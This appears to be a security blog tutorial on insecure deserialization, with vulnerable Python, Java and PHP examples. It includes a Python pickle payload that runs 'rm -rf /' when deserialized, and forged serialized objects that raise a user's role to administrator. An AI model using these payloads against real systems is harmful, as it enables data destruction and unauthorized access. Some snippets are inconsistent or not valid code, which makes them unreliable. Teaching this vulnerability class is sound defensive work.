Harsh Dhamaniya

Insecure Deserialization : The Hidden Danger

Serialization and deserialization are fundamental concepts in computer science, particularly in the context of data storage, communication between different systems, and object-oriented programming. Let’s delve deeper into these concepts:

Serialization:

Serialization is the process of converting an object into a format that can be easily stored or transmitted across a network. The primary goal of serialization is to save the state of an object in such a way that it can be reconstructed later when needed. This process typically involves converting the object into a byte stream or a string representation.

Key points about serialization:

  1. State Preservation: Serialization preserves the state of an object, including its data and internal structure, so that it can be reconstructed accurately at a later time.
  2. Platform Independence: Serialized data can be transmitted between different systems or platforms, regardless of the programming languages or architectures involved. This makes serialization a valuable tool for interoperability.
  3. Persistence: Serialized data can be stored persistently in files or databases, allowing it to be retrieved and reconstructed at a later time, even after the original program has terminated.
  4. Security Considerations: While serialization facilitates data interchange, it’s essential to consider security aspects, especially when dealing with external data sources. Improperly deserializing untrusted data can lead to security vulnerabilities like deserialization attacks.
  5. Customization: Serialization frameworks often provide options for customizing the serialization process, such as specifying which fields to include or exclude, handling complex data structures, or implementing custom serialization logic for specific types.

Deserialization:

Deserialization is the reverse process of serialization. It involves reconstructing an object from its serialized form, restoring it to its original state. When data is deserialized, it is transformed from its compact representation (byte stream or string) back into an object that can be used within a program.

Access All Labs : Here

Key points about deserialization:

  1. Object Reconstruction: Deserialization reconstructs the serialized data into an object, restoring its state to what it was when it was serialized. This allows the program to work with the object as if it had never been serialized.
  2. Type Compatibility: Deserialization requires that the receiving program has access to the appropriate class definitions or type information needed to reconstruct the object accurately. Without this information, deserialization may fail or result in incorrect object instantiation.
  3. Data Integrity: Deserialization must ensure that the reconstructed object retains its integrity, meaning that all data members are restored correctly, and the object’s behavior remains consistent with its original implementation.
  4. Error Handling: Deserialization frameworks often provide mechanisms for handling errors that may occur during the deserialization process, such as data corruption, version mismatches, or missing dependencies.
  5. Performance Considerations: Deserialization can be a computationally intensive process, especially for large or complex objects. Optimizations, such as lazy loading or caching, may be employed to improve performance.

In summary, serialization and deserialization are essential techniques for data interchange, persistence, and communication between different systems or components within a software application. Understanding these concepts is crucial for designing robust, scalable, and interoperable software systems.

Serialization Formats:

  1. Binary Formats: Some languages serialize objects into binary formats, which are optimized for efficiency and compactness. Binary serialization is often faster and produces smaller serialized data compared to other formats. However, binary formats are typically not human-readable, making them less suitable for scenarios where readability is important.
  2. String Formats: Other languages may use string-based formats for serialization, which offer varying degrees of human readability. Examples include JSON (JavaScript Object Notation), XML (eXtensible Markup Language), YAML (YAML Ain’t Markup Language), and others. String-based formats are often preferred in scenarios where interoperability with other systems or human readability is important, even though they may be less efficient in terms of space and processing.

Handling of Object Attributes:

  1. Inclusion of Private Fields: Serialization typically includes all of an object’s attributes, including private fields, unless explicitly excluded. This behavior ensures that the serialized data accurately represents the object’s state. However, exposing private fields in serialized data may raise security or privacy concerns, especially if the data is transmitted over a network or stored persistently.
  2. Transient Fields: To prevent specific fields from being serialized, some languages provide mechanisms for marking fields as “transient” or “non-serializable” in the class declaration. Transient fields are excluded from the serialization process, allowing developers to control which parts of an object’s state are included in the serialized data.

Terminology:

  1. Marshalling and Pickling: In some programming languages, serialization may be referred to as “marshalling” or “pickling.” For example, in Ruby, the term “marshalling” is commonly used to describe the process of converting objects into a format suitable for storage or transmission. Similarly, in Python, the term “pickling” is used to refer to the serialization of objects.

Understanding these differences in terminology can be helpful when working with serialization across multiple programming languages or environments. Despite the varying terminology, the underlying concepts of serialization remain consistent, involving the conversion of objects into a portable format for storage, transmission, or inter-process communication.

What is insecure deserialization?

Insecure deserialization occurs when a website deserializes user-controllable data. This could allow an attacker to manipulate serialized objects and introduce harmful data into the application code.

An attacker could even replace a serialized object with an object of an entirely different class. Worryingly, any class available to the website can be deserialized and instantiated, regardless of the expected class. This is why insecure deserialization is sometimes referred to as an “object injection” vulnerability.

let’s break down the technical aspects of insecure deserialization with a simple code example in Python. We’ll create a scenario where a website receives serialized data and deserializes it without proper validation.

import pickle  # Python module for serializing and deserializing objects

# Function to deserialize data received from the user
def deserialize_data(serialized_data):
    return pickle.loads(serialized_data)

# Function to perform some action based on the deserialized data
def process_data(data):
    # In a real scenario, this function would perform some legitimate action
    # However, for demonstration purposes, we'll just print the data
    print("Processing data:", data)

# Main function to simulate a website receiving serialized data
def main():
    # Serialized data received from the user (simulated)
    serialized_data = b'\\x80\\x04\\x95\\x11\\x00\\x00\\x00\\x00\\x00\\x00\\x00}\\x94.'

    # Deserialize the data
    deserialized_data = deserialize_data(serialized_data)

    # Process the deserialized data
    process_data(deserialized_data)

if __name__ == "__main__":
    main()

Explanation:

  1. We import the pickle module, which is commonly used in Python for serializing and deserializing objects.
  2. We define a function deserialize_data(serialized_data) that deserializes the data received from the user using pickle.loads().
  3. We define a function process_data(data) that performs some action based on the deserialized data. In a real scenario, this function would perform legitimate actions based on the deserialized data.
  4. In the main() function, we simulate the website receiving serialized data (represented by the variable serialized_data).
  5. We deserialize the received data using the deserialize_data() function.
  6. We process the deserialized data using the process_data() function.

Now, let’s explain the vulnerability:

In this code, the website blindly deserializes the data received from the user using pickle.loads(). This means the user can send any serialized object, including malicious ones. For example, the user could send a serialized object that executes harmful code when deserialized. Here’s how an attacker might exploit this:

import pickle
import os

# Malicious code
class MaliciousCode:
    def __reduce__(self):
        # Execute arbitrary system command (e.g., delete files)
        return (os.system, ('rm -rf /',))

# Serialize the malicious object
malicious_object = MaliciousCode()
serialized_malicious_data = pickle.dumps(malicious_object)

# Print the serialized data (for demonstration purposes)
print(serialized_malicious_data)

Explanation:

  1. We define a class MaliciousCode that contains malicious code to execute arbitrary system commands using the __reduce__() method.
  2. We create an instance of MaliciousCode and serialize it using pickle.dumps().
  3. The serialized malicious data can then be sent to the website, and when the website deserializes it using pickle.loads(), the malicious code will be executed, potentially causing harm, such as deleting files (rm -rf /).

An unexpected class object might trigger an exception. However, the harm might already be inflicted by this point. Many attacks based on deserialization are completed before the deserialization process ends. This means an attack can be initiated by the deserialization process itself, even if the website’s functionality does not directly interact with the malicious object. Therefore, websites that rely on strongly typed languages can also be susceptible to these techniques.

let’s dive into some technical examples to understand insecure deserialization better:

  1. Java Example:
// Deserialize object from user input
ObjectInputStream ois = new ObjectInputStream(userInput);
Object obj = ois.readObject();

// Process deserialized object

In this Java code snippet, ObjectInputStream is used to deserialize an object from the userInput. The readObject() method reads the serialized object from the input stream. However, there’s no validation or sanitization of the userInput, meaning that any serialized data provided by the user will be blindly deserialized.

This lack of validation can lead to serious security vulnerabilities. For instance, an attacker could craft a malicious serialized object containing executable code. When this object is deserialized, the code will be executed within the context of the application, potentially causing harm.

  1. Python Example:
import pickle

# Deserialize object from user input
user_input = b"\\x80\\x04\\x95\\x1b\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x8c\\x08builtins\\x94\\x8c\\x05print\\x94\\x93\\x94."
obj = pickle.loads(user_input)

# Process deserialized object

In this Python code, the pickle module is used for serialization and deserialization. The pickle.loads() function deserializes the user_input, which is a byte string representing a serialized object. Similarly to the Java example, there’s no validation of the input data, leaving the application vulnerable to deserialization attacks.

An attacker could manipulate the serialized data to include malicious code, such as system commands or arbitrary Python code. When the pickle.loads() function is called, the malicious code will be executed, potentially compromising the security of the application.

  1. PHP Example:
// Deserialize object from user input
$obj = unserialize($_POST['data']);

// Process deserialized object

In this PHP code snippet, the unserialize() function is used to deserialize data received via a POST request. The $_POST['data'] variable contains the serialized object provided by the user. Similar to the previous examples, there’s no validation of the input data, making the application susceptible to deserialization attacks.

An attacker could manipulate the serialized data to include malicious PHP code, such as system commands or code that accesses sensitive information. When the unserialize() function is called, the malicious code will be executed within the context of the application, potentially leading to security breaches.

Overall, in all these code examples, the lack of input validation before deserialization allows attackers to inject and execute arbitrary code, leading to severe security vulnerabilities. It’s crucial for developers to implement proper input validation and sanitization measures to mitigate the risks associated with insecure deserialization.

How do insecure deserialization vulnerabilities arise?

Insecure deserialization vulnerabilities often stem from a lack of awareness about the risks associated with deserializing user-controlled data. Ideally, developers should avoid deserializing user input altogether due to the potential security implications.

However, some website owners may believe they are protected because they implement additional checks on the deserialized data. Unfortunately, relying solely on post-deserialization validation or sanitization measures is insufficient, as it’s challenging to anticipate and address every possible attack scenario effectively.

Furthermore, vulnerabilities can arise when developers mistakenly trust deserialized objects to be inherently safe, especially when using binary serialization formats. However, attackers can manipulate binary serialized objects with similar ease as string-based formats, given enough effort.

The complexity of modern websites, with numerous dependencies and libraries, further exacerbates the problem. With a wide range of classes and methods available for exploitation, it becomes challenging to predict and prevent all possible attack vectors. Attackers can exploit this complexity by chaining unexpected method invocations, potentially compromising the security of the application.

In summary, securely deserializing untrusted input is a daunting task, as it’s difficult to anticipate and mitigate all potential vulnerabilities effectively. Therefore, it’s crucial for developers to adopt a cautious approach and prioritize security when implementing deserialization functionality in their applications.

Now that we have understood how serialization and deserialization works, let’s explore how privilege escalation can be achieved by exploiting insecure deserialization vulnerabilities in PHP, Python, and Java.

Lab 1 : Modifying serialized objects (Privilege Escalation Technique)

PHP Example:

<?php
    $serialized_data = $_COOKIE['session_data']; // Assume session cookie contains serialized object
    $user = unserialize($serialized_data);

    if ($user['role'] == 'administrator') {
        // Admin Privileges Code
    } else {
        // User Privileges Code
    }
?>

Exploit Example (PHP):

To exploit this vulnerability, an attacker can craft a malicious serialized object with the role attribute set to 'administrator' and inject it into the session cookie. Here’s an example of a malicious serialized object:

O:7:"stdClass":1:{s:4:"role";s:13:"administrator";}

By setting the role attribute to 'administrator', the attacker can trick the application into granting admin privileges, regardless of the user’s actual role.

Python Example:

import pickle

# Assume session cookie contains serialized object
serialized_data = b'\\x80\\x03csession\\nUser\\nq\\x00)\\x81q\\x01}q\\x02X\\x04\\x00\\x00\\x00roleq\\x03X\\x05\\x00\\x00\\x00adminq\\x04s.'
user = pickle.loads(serialized_data)

if user['role'] == 'administrator':
    # Admin Privileges Code
else:
    # User Privileges Code

Exploit Example (Python):

Similarly, an attacker can craft a malicious serialized object with the role attribute set to 'administrator' and inject it into the session data. Here’s an example of a malicious serialized object:

b'\\x80\\x03csession\\nUser\\nq\\x00)\\x81q\\x01}q\\x02X\\x04\\x00\\x00\\x00roleq\\x03X\\x05\\x00\\x00\\x00adminq\\x04s.'

By manipulating the serialized data in this way, the attacker can escalate privileges and gain admin access.

Java Example:

import java.io.*;

// Assume session cookie contains serialized object
byte[] serializedData = ...; // Deserialize the session cookie
ByteArrayInputStream bis = new ByteArrayInputStream(serializedData);
ObjectInputStream ois = new ObjectInputStream(bis);
User user = (User) ois.readObject(); // Assume User class has 'role' attribute

if (user.getRole().equals("administrator")) {
    // Admin Privileges Code
} else {
    // User Privileges Code
}

Exploit Example (Java):

To exploit this vulnerability in Java, an attacker can craft a malicious serialized object with the role attribute set to 'administrator' and tamper with the session cookie. Here’s a basic example of how the malicious serialized object might look:

byte[] serializedData = ...; // Malicious serialized data

By injecting this manipulated serialized data into the session cookie, the attacker can achieve privilege escalation and gain admin privileges.

What is the impact of insecure deserialization?

The impact of insecure deserialization can be devastating, primarily because it greatly expands the attack surface of an application. Here’s a closer look at some of the potential impacts:

  1. Remote Code Execution (RCE): Insecure deserialization can allow attackers to inject and execute arbitrary code within the context of the application. This can lead to complete compromise of the targeted system, enabling attackers to take control over the entire application or underlying server.
  2. Privilege Escalation: Attackers can manipulate serialized data to escalate their privileges within the application. By changing their user role or access level, attackers can gain unauthorized access to sensitive functionalities or resources, such as administrative panels or confidential data.
  3. Arbitrary File Access: Insecure deserialization vulnerabilities can be exploited to access and manipulate files on the server. Attackers may craft malicious serialized objects to include file paths or commands that, when deserialized, lead to unauthorized reading, writing, or deletion of files.
  4. Denial-of-Service (DoS) Attacks: In some cases, insecure deserialization vulnerabilities can be exploited to cause denial-of-service attacks by consuming excessive server resources or triggering infinite loops. This can result in system unavailability, disruption of services, or server crashes.
  5. Data Tampering: Attackers can modify serialized objects to manipulate application data or alter the behavior of the application. By tampering with serialized data, attackers may bypass authentication mechanisms, modify user permissions, or introduce malicious payloads into the application’s workflow.
  6. Data Exposure: Insecure deserialization vulnerabilities may lead to the exposure of sensitive information stored within serialized objects. Attackers can craft payloads to extract confidential data, such as credentials, session tokens, or encryption keys, compromising the confidentiality of the application’s data.
  7. Replay Attacks: Serialized objects may contain time-sensitive data or cryptographic tokens that can be exploited in replay attacks. Attackers can intercept and replay serialized data to impersonate legitimate users, bypass security controls, or perform unauthorized actions.
 

Leave a Reply

Your email address will not be published. Required fields are marked *